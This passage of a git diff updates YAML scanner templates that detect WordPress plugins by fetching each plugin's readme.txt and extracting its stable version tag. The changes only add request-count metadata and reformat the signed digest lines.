plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d141a6ed28fe563c0e1de541a91d7fc79febfcd2f89a7bf805234be9db9b1055022100d4b97e9979efd60ccd441be3ad6f548487f4058b59368d2298777ae1283f4767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d141a6ed28fe563c0e1de541a91d7fc79febfcd2f89a7bf805234be9db9b1055022100d4b97e9979efd60ccd441be3ad6f548487f4058b59368d2298777ae1283f4767:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index 258a7e5ef5..ae0383e358 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/easy-fancybox/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fdfe55fbb0593d836745e87924f33232d1eb6c7927c404f0dd44317d0c98bec5022100c6237c28bfd066c6f309c031aa1d24cf411b59832211c31fb0d4405f2c7674e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fdfe55fbb0593d836745e87924f33232d1eb6c7927c404f0dd44317d0c98bec5022100c6237c28bfd066c6f309c031aa1d24cf411b59832211c31fb0d4405f2c7674e4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index ee9d39ee60..2339b58d15 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/easy-table-of-contents/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d95964151d65496645482ea24acc006f0bc591cc55f57faf367ca2b95b9cdb80022100bc357eb9a2b54ec1a037c42ac56832b61f7fcd7703ead3cb293389230b66f9bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d95964151d65496645482ea24acc006f0bc591cc55f57faf367ca2b95b9cdb80022100bc357eb9a2b54ec1a037c42ac56832b61f7fcd7703ead3cb293389230b66f9bd:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index f806930942..12bd0bffe8 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a4f2064aac01e3e9a20fe7b66fc8837720fa8f7a70c65e3e913e9573175051a602207250c58cd5edf3f6ba5e2b2b76a02f4b6bd5a36d051e7df6775479a0317888c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a4f2064aac01e3e9a20fe7b66fc8837720fa8f7a70c65e3e913e9573175051a602207250c58cd5edf3f6ba5e2b2b76a02f4b6bd5a36d051e7df6775479a0317888c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 2318662171..34988d5e58 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c208d56b33b7418a5cb610bd31d48a9a7859017b00b54074e96082b3742bc3a8022100fdbb2ebe3eef918459432c8deac29f413797e477939b965041f3d4cc3b58d767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c208d56b33b7418a5cb610bd31d48a9a7859017b00b54074e96082b3742bc3a8022100fdbb2ebe3eef918459432c8deac29f413797e477939b965041f3d4cc3b58d767:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index b5ce8d19dc..964850e620 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/elementskit-lite/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207b0751725beb69c945a3e2b60648d2df2dc13527a68318da0be4861a7b3a19ab022010d4edb82e177162c4d436677b0842fba72c1022dd4e911e03817a4c11d82aa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207b0751725beb69c945a3e2b60648d2df2dc13527a68318da0be4861a7b3a19ab022010d4edb82e177162c4d436677b0842fba72c1022dd4e911e03817a4c11d82aa0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index be93b75726..cf582212a2 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/enable-media-replace/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220339c01997159cbf93e95da26a6c5937c60f3d453348fefc249f00b5deec3a9f9022100c960e57b20f2b14e654a0e801bc5ca1bfcb2e8a314cde65f2e6f3fefb12754c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220339c01997159cbf93e95da26a6c5937c60f3d453348fefc249f00b5deec3a9f9022100c960e57b20f2b14e654a0e801bc5ca1bfcb2e8a314cde65f2e6f3fefb12754c0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index b22af4007f..ce1f498e15 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/envato-elements/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220037d8b03ae73936f26b3f9f020ff27fa2900b9b04024ed88eed27a4222a3845e022100a610250411056c84544bee780a0d21c4f9e04ba2fe60cbf0dd9dd71994ca983b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220037d8b03ae73936f26b3f9f020ff27fa2900b9b04024ed88eed27a4222a3845e022100a610250411056c84544bee780a0d21c4f9e04ba2fe60cbf0dd9dd71994ca983b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 21aed541b0..3fd4c21771 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022058de2ffc84aa0c8c82094246cc7e2916e8779bee59e44c65b28074b6dc102cde02205f87a5c49fbf761c92e38e55f0299a7403953ecaaf7d2ce36838db19dffcc691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022058de2ffc84aa0c8c82094246cc7e2916e8779bee59e44c65b28074b6dc102cde02205f87a5c49fbf761c92e38e55f0299a7403953ecaaf7d2ce36838db19dffcc691:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index c15b80d531..aa69e7ae55 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ewww-image-optimizer/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b49b8a5fd4e6c86d682711b2a98087c17f456e476bc737b9206d218b6c7cec50220396463b85bd804031ebe4502bb1382e8a4fbafebf5bfad3cf5bf2379bf682a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201b49b8a5fd4e6c86d682711b2a98087c17f456e476bc737b9206d218b6c7cec50220396463b85bd804031ebe4502bb1382e8a4fbafebf5bfad3cf5bf2379bf682a92:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 1734030b69..766eed451a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/facebook-for-woocommerce/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dad68e0d5e49d96549b3255ce97bfbbe110474dfd48923a16c414e0893e02804022100854515088550000f9f4b26bf21070bc3d8eff83fea28e7ede5f37f3b8bff3130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100dad68e0d5e49d96549b3255ce97bfbbe110474dfd48923a16c414e0893e02804022100854515088550000f9f4b26bf21070bc3d8eff83fea28e7ede5f37f3b8bff3130:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 1f78e60c6a..9d5b5e7a97 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/fast-indexing-api/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100abd0a6371959f3883ff4b225ec83dc028b8051ab7bedcb85ec23482f03bfec03022070aa50f3b09773ab76bfe5ed661838d8ff1b69d578d0d8df6cfbfa861a6f5780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100abd0a6371959f3883ff4b225ec83dc028b8051ab7bedcb85ec23482f03bfec03022070aa50f3b09773ab76bfe5ed661838d8ff1b69d578d0d8df6cfbfa861a6f5780:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index d34374a683..39b0e8b13d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/favicon-by-realfavicongenerator/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210093168193fc98c11adcc3038a7ea53aeb8173e8c778f67583fcb25b247cea66910220136ab57b43d287c421e4083574c003159406e55a77051f7ffc804b5d0c136d1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210093168193fc98c11adcc3038a7ea53aeb8173e8c778f67583fcb25b247cea66910220136ab57b43d287c421e4083574c003159406e55a77051f7ffc804b5d0c136d1e:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index bb758dbed1..2ad5333553 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/flamingo/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cee96332eaf921af6ffe00b19eff089cdc36e4e9c083c2891d00c6ed29f420a3022039b024281837a5b63e234c2d4b29f805b617cdcbcf859d2d77027fe1d9b7de04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100cee96332eaf921af6ffe00b19eff089cdc36e4e9c083c2891d00c6ed29f420a3022039b024281837a5b63e234c2d4b29f805b617cdcbcf859d2d77027fe1d9b7de04:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 0017d2a7af..19ae23e269 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c816523829afe97b1edf8874a170c5967133ee022da9a5e0ca167f5f2a319d90220013bb0fb88134fccb43e1a0e67154781c8de4d3e37609245a98c0f8917696d21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204c816523829afe97b1edf8874a170c5967133ee022da9a5e0ca167f5f2a319d90220013bb0fb88134fccb43e1a0e67154781c8de4d3e37609245a98c0f8917696d21:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 881f5676df..628d51d33c 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/font-awesome/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d51acd82ec0a9c1e66e7911d874453e66e630c6d3b7f76dc431af56132cd3eb8022100f6627220b9c64b6d1478bc39da8895c4ee7c260a862fad30877fe94c1d786690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d51acd82ec0a9c1e66e7911d874453e66e630c6d3b7f76dc431af56132cd3eb8022100f6627220b9c64b6d1478bc39da8895c4ee7c260a862fad30877fe94c1d786690:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 517782c5a6..ce6b894be4 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/force-regenerate-thumbnails/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d5a3387ce34f9b7c930e84ea718ff59b3fb544f8db3b47a4bb60255f6c996d5d022030989881a503f8dafd5ff164dfcc2d984c42a7e729e7d204d0d98b47f4a01af0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d5a3387ce34f9b7c930e84ea718ff59b3fb544f8db3b47a4bb60255f6c996d5d022030989881a503f8dafd5ff164dfcc2d984c42a7e729e7d204d0d98b47f4a01af0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index bc162a8e9c..e0f151e797 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/formidable/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dbce6f65da66c8559f0dc64194c62caa4fe5376a60f75e8ad95a95cf4787703e02206abacee801776c294c37d8f1463f1285eeab3b61934b1b36e51533e31fe704b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100dbce6f65da66c8559f0dc64194c62caa4fe5376a60f75e8ad95a95cf4787703e02206abacee801776c294c37d8f1463f1285eeab3b61934b1b36e51533e31fe704b0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 7b0bee1421..79b96c4ef7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e3dd3182876e7287b47755ba9fa5097a2a5f5a5c105355ae5fa0fae1d0e55cce02210099382ae4c59ccce33e83c6208c6e42bbd154b45ddaee6627940672547bee3b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e3dd3182876e7287b47755ba9fa5097a2a5f5a5c105355ae5fa0fae1d0e55cce02210099382ae4c59ccce33e83c6208c6e42bbd154b45ddaee6627940672547bee3b94:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 9c1d574344..ee162d3740 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ga-google-analytics/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d5160a1181f37283eaa6d055a062352688c90fdad88148faab1bab9b2c093adf022028e868c20adad0a5bb2fabd10ed3cf48cb77cb5b6a4b70eb1a7313658a6ba6cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d5160a1181f37283eaa6d055a062352688c90fdad88148faab1bab9b2c093adf022028e868c20adad0a5bb2fabd10ed3cf48cb77cb5b6a4b70eb1a7313658a6ba6cb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 00087a52eb..7c93d0315e 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/gdpr-cookie-compliance/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204a3a8656b814f7ca676cafc368086e7b3fafa08deeb10f61d64bbd3053471f0a02205c35ab772e6d0e5f6a233cf1f7156dded8dab29f1fffbcc282d35517e6ca907f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204a3a8656b814f7ca676cafc368086e7b3fafa08deeb10f61d64bbd3053471f0a02205c35ab772e6d0e5f6a233cf1f7156dded8dab29f1fffbcc282d35517e6ca907f:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 3e9428ee18..075c4ad880 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-analytics-dashboard-for-wp/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022047ab98e1d28c9016fba32e86889bcecb430714afaa97eb0789a58f36a5b6ec5002203377a9ecadaee18d59ca8ca7baa3ff88ffcf7390828352d07300b54a7be279db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022047ab98e1d28c9016fba32e86889bcecb430714afaa97eb0789a58f36a5b6ec5002203377a9ecadaee18d59ca8ca7baa3ff88ffcf7390828352d07300b54a7be279db:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 2770ac5be0..1de8bedba9 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-analytics-for-wordpress/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b74e053436e1490e5bc59f788c85d548b8230b36a74c8bfec3d0df85a9756ffe022100c03ebeac7033ce5980b5bdd574e485ec9f5743de9ec602a96faba7eb6db2e67b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b74e053436e1490e5bc59f788c85d548b8230b36a74c8bfec3d0df85a9756ffe022100c03ebeac7033ce5980b5bdd574e485ec9f5743de9ec602a96faba7eb6db2e67b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 3cbacec89e..88ac5e2121 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-listings-and-ads/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c7c659e7885e1b793bdcee8651507fd16a796e400646036aee5e64573814eb63022100c8232777c1a58eda5dbe88610a9696a5d7e03221d3ab52c5951f15756835d155:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c7c659e7885e1b793bdcee8651507fd16a796e400646036aee5e64573814eb63022100c8232777c1a58eda5dbe88610a9696a5d7e03221d3ab52c5951f15756835d155:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2a77c35daa..045fd15af6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-site-kit/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210084783c3e125824e7788a7a665b8985474c626448d8a88a8d3b8d46aec478eff8022100e24b5264e1392a8a01dd15fe9b88b77d94cf6696846635e35818de99ceb9ed04:922c64590222798bb761d5b6d8e72950 \ No newline at end of 